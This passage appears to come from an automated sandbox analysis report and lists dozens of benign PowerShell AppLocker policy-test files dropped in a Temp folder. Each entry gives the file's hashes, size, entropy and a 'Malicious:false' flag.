                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0dzfrdi.wpk.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5cvjvys.k24.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0s0z10u.zk4.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ia44xj0y.snr.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idorrz2v.a52.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jljjwxpi.rmg.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jr1ujvsh.0pc.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvya3obb.etl.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jxeac3yf.xa1.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_khqdoywn.nit.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqnn253l.wer.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktslus02.hx2.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1fxpm4h.nmg.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldlf5oxu.kgh.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_miept53b.2gu.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mj0jhivt.oom.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mk3l4pyr.twz.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mwhkvmtz.kuj.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n1z4gi1t.0dh.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nhno1ncm.j1b.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrzdlshx.dqw.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nw1xmalu.wj1.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o0scnvqa.em3.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_omt0ynyh.vcs.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p2ogmwlc.2hz.ps1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p4cyflby.xgc.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pm2ncara.zli.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ppj1m2px.5n1.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ppxpikzf.kul.psm1

                                                                                                Download File
                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):60
                                                                                                Entropy (8bit):4.038920595031593
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                Malicious:false
                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
